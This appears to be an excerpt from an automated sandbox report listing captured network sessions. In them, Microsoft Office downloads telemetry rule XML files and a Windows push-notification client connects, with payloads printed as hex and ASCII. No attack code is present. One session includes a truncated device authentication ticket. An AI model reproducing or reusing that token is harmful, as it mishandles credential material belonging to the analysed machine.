                                                                                                                                                                      x-ms-request-id: e579fe48-a01e-001e-648c-3a49ef000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052321Z-1777c6cb7549x5qchC1TEBggbg0000000akg00000000t311
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:21 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      8192.168.2.64971513.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:21 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:21 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 450
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                      ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                      x-ms-request-id: ac6669be-e01e-003c-668c-3ac70b000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052321Z-1777c6cb754lvj6mhC1TEBke940000000at00000000037dx
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:21 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      9192.168.2.64971713.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:21 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:21 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 2160
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                      ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                      x-ms-request-id: 8753231e-501e-008f-038c-3a9054000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052321Z-r1d97b99577ckpmjhC1TEBrzs000000009yg000000008m82
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:21 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      10192.168.2.64971613.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:21 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:21 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 2980
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                      x-ms-request-id: 1aa7a34d-201e-0096-3676-3bace6000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052321Z-178bfbc474btrnf9hC1NYCb80g000000013000000000q4gs
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:21 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      11192.168.2.64972040.113.110.67443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:22 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 62 78 33 66 67 61 6f 54 53 30 61 2b 37 6c 39 68 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 33 64 62 38 31 37 65 30 61 39 61 34 62 39 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: CNT 1 CON 305MS-CV: bx3fgaoTS0a+7l9h.1Context: 23db817e0a9a4b90
                                                                                                                                                                      2024-11-21 05:23:22 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                      2024-11-21 05:23:22 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 62 78 33 66 67 61 6f 54 53 30 61 2b 37 6c 39 68 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 33 64 62 38 31 37 65 30 61 39 61 34 62 39 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 72 79 47 49 6c 4b 61 41 6e 50 4f 46 75 6f 37 50 51 78 50 4e 74 7a 2f 55 50 53 70 47 64 79 36 48 49 54 55 4f 41 43 33 4e 76 34 6c 65 44 43 4b 77 6e 41 30 38 78 51 77 58 4f 6d 56 74 55 72 69 36 61 48 65 59 71 38 6d 50 64 46 34 6a 77 51 57 6d 37 79 4c 42 44 64 34 41 5a 52 38 41 6e 45 5a 4d 4f 4b 63 4f 5a 7a 4d 6f 41 2b 2f 62
                                                                                                                                                                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: bx3fgaoTS0a+7l9h.2Context: 23db817e0a9a4b90<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXryGIlKaAnPOFuo7PQxPNtz/UPSpGdy6HITUOAC3Nv4leDCKwnA08xQwXOmVtUri6aHeYq8mPdF4jwQWm7yLBDd4AZR8AnEZMOKcOZzMoA+/b
                                                                                                                                                                      2024-11-21 05:23:22 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 62 78 33 66 67 61 6f 54 53 30 61 2b 37 6c 39 68 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 33 64 62 38 31 37 65 30 61 39 61 34 62 39 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: bx3fgaoTS0a+7l9h.3Context: 23db817e0a9a4b90<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                      2024-11-21 05:23:23 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                      Data Ascii: 202 1 CON 58
                                                                                                                                                                      2024-11-21 05:23:23 UTC58INData Raw: 4d 53 2d 43 56 3a 20 52 51 55 38 41 71 42 63 46 6b 71 45 50 6d 32 72 54 72 66 68 6c 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                      Data Ascii: MS-CV: RQU8AqBcFkqEPm2rTrfhlg.0Payload parsing failed.


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      12192.168.2.64972413.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:23 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:24 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:23 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 632
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                      ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                      x-ms-request-id: b54876a2-a01e-0070-6764-3b573b000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052323Z-178bfbc474bscnbchC1NYCe7eg000000015g00000000a5rk
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:24 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      13192.168.2.64972213.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:23 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:23 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                      ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                      x-ms-request-id: a6bfa609-001e-00a2-4d66-3bd4d5000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052323Z-178bfbc474bp8mkvhC1NYCzqnn00000000rg00000000xs3w
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:24 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      14192.168.2.64972113.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:23 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:24 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 474
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                      ETag: "0x8DC582B9964B277"
                                                                                                                                                                      x-ms-request-id: e592c5af-601e-000d-69fb-3a2618000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052324Z-1777c6cb754gvvgfhC1TEBz4rg0000000at0000000002vhu
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:24 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      15192.168.2.64972313.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:23 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:24 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:24 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 471
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                      ETag: "0x8DC582BB10C598B"
                                                                                                                                                                      x-ms-request-id: 17c3c293-501e-00a3-6567-3bc0f2000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052324Z-178bfbc474bw8bwphC1NYC38b400000000x00000000050zr
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:24 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      16192.168.2.64972513.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:23 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:24 UTC491INHTTP/1.1 200 OK
